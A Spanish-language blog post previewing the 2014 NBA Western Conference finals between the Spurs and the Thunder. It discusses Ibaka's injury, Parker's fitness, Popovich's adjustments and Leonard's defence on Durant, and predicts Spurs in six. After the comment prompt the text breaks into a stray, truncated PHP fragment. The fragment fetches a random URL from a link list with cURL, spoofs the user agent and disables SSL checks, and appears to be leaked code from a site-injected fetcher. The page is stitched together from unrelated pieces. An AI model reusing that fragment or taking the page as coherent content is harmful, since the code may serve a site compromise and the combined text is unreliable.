PO 2014: Previa San Antonio Spurs – Oklahoma City Thunder

19 de May de 2014 por MagicJohnson32

ducan kg

Unos, los Thunder, tienen al MVP de la temporada. Otros, los Spurs, cuentan con el entrenador y el ejecutivo del año. De alguna manera, estos galardones sirven para algo más que reconocer las magníficas campañas que vienen realizando Oklahoma City y San Antonio: sintetizan lo que son ambos equipos, las fortalezas que les han consolidado como dominadores de la poderosísima Conferencia Oeste. El talento individual, concentrado en los nombres del MVP Durant y Russell Westbrook, contra la celebración del colectivo, obra y diseño de Gregg Popovich. Bienvenidos sean ustedes a las finales del Oeste.

La serie no solo enfrenta al primero de la división Northwest con el primero de la Southwest, y no solo a los dos primeros del Oeste, sino a los dos mejores equipos de la regular season 2013-2014, al menos si nos atenemos al balance cosechado a la conclusión de los 82 partidos de rigor. Se trata, también, de los dos últimos campeones del Oeste. Es, en definitiva, la final de conferencia que estaba escrita y la que tendremos la fortuna de disfrutar a partir de esta próxima madrugada a las 03h00, con el primer asalto en el AT&T de San Antonio.

No es tarea sencilla analizar la serie. Por un lado, esta temporada los Thunder han dominado a San Antonio en todos y cada uno de sus cuatro encuentros, resueltos siempre con más o menos contundentes victorias de OKC. Por otro, la ausencia de Ibaka condiciona profundamente los esquemas de Brooks (¿tiene esquemas Brooks?). Además, la trayectoria de los Spurs en los Playoffs, tras las dudas iniciales ante los Mavs, parece mucho más sólida visto el modo en el que despacharon a los Blazers, algo que contrasta con las dificultades que encontraron los Thunder tanto contra Memphis como frente a Clippers.

Claves de la eliminatoria:

  • Let’s get physical: La exuberancia física del conjunto dirigido por Scott Brooks se ha demostrado difícil de contener por parte texana pero la baja segura de Ibaka, lesionado en el 6º y definitivo partido frente a los Clippers, presenta una complicación difícilmente superable para su equipo. Brooks no ha querido desvelar sus planes para suplir la ausencia del internacional español. Puede enrocar con el rookie Adams ante Tim Duncan (como ocasionalmente hizo ante Randolph y Griffin) y tratar de sellar la pintura en la medida de lo posible, o bien tocar a zafarrancho, con Reggie Jackson como pareja de backcourt de Westbrook y con Durant de 4. Posiblemente veamos un poco de todo pero lo que resulta seguro es que se echará en falta la figura de Ibaka en la defensa interior de los Thunder.
  • russ tpOh-la-la?: Pese a todas las precauciones que toma Popovich, no todo son cielos azules para los Spurs en el apartado físico, ya que Tony Parker arrastra unas molestias musculares que no deberían impedirle estar de inicio en el primer partido de la serie pero que pueden afectarle ante la exigencia tan brutal que siempre supone ese caballo desbocado que es Westbrook. Patty Mills ha estado excelente cada vez que se le ha requerido, pero la progresiva mejoría de San Antonio en estos Playoffs ha ido de la mano del francés, demoledor en su duelo contra Lillard antes de caer lesionado. Los Thunder y Westbrook -quien, por su parte, acostumbra a ser una pesadilla para los Spurs y llega en un estado de forma magnífico- han de castigar a Parker en defensa desde el mismo salto inicial.
  • No es justo: Con tantas incógnitas, posibles variables y alternativas, la capacidad de reacción y los ajustes tácticos se presentan fundamentales. En ese aspecto, la inferioridad que padecen los Thunder con respecto a los Spurs es casi cruel. Popovich ha vuelto a mostrarse como el gran orfebre en la gestión de recursos, minimizando la carga sobre sus estrellas y sacando petróleo de gente como Mills, Belinelli, Diaw y -al fin- Splitter. Los planteamientos de Brooks, en cambio, raramente se alejan de poner la bola en manos de Durant y Westbrook.
  • Kawhi, el anti-KD: Pese a ser barridos por los Thunder en esta regular season, los Spurs pueden sacar algo positivo de los más recientes precedentes entre ambos equipos, y es la capacidad de Kawhi Leonard de poner las cosas difíciles a Durant.  El MVP vio cómo ante la defensa de Leonard se reducía su acierto a un 45% (39 de 85 en tiros de campo) y se aumentaban sus pérdidas de balón a 6 por encuentro. Cualquier esperanza que tengan los Thunder de alcanzar las Finales pasa por un Kevin Durant descomunal, y Leonard es de los pocos jugadores con la inteligencia, la envergadura y los recursos necesarios para tratar de frenar a KD.

Pronóstico: Se presentaban unas finales de Conferencia extremadamente equilibradas, incluso favorables para Oklahoma, pero la baja de Ibaka parece demasiada losa para los Thunder, que no disponen de los jugadores ni de los recursos tácticos para sobreponerse. En cualquier caso, todo apunta a un gran Westbrook y ya sabemos de qué es capaz Kevin Durant. Si Parker recae, entonces habrá serie; mientras tanto, el favoritismo es indiscutiblemente para los Spurs. 4-2.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>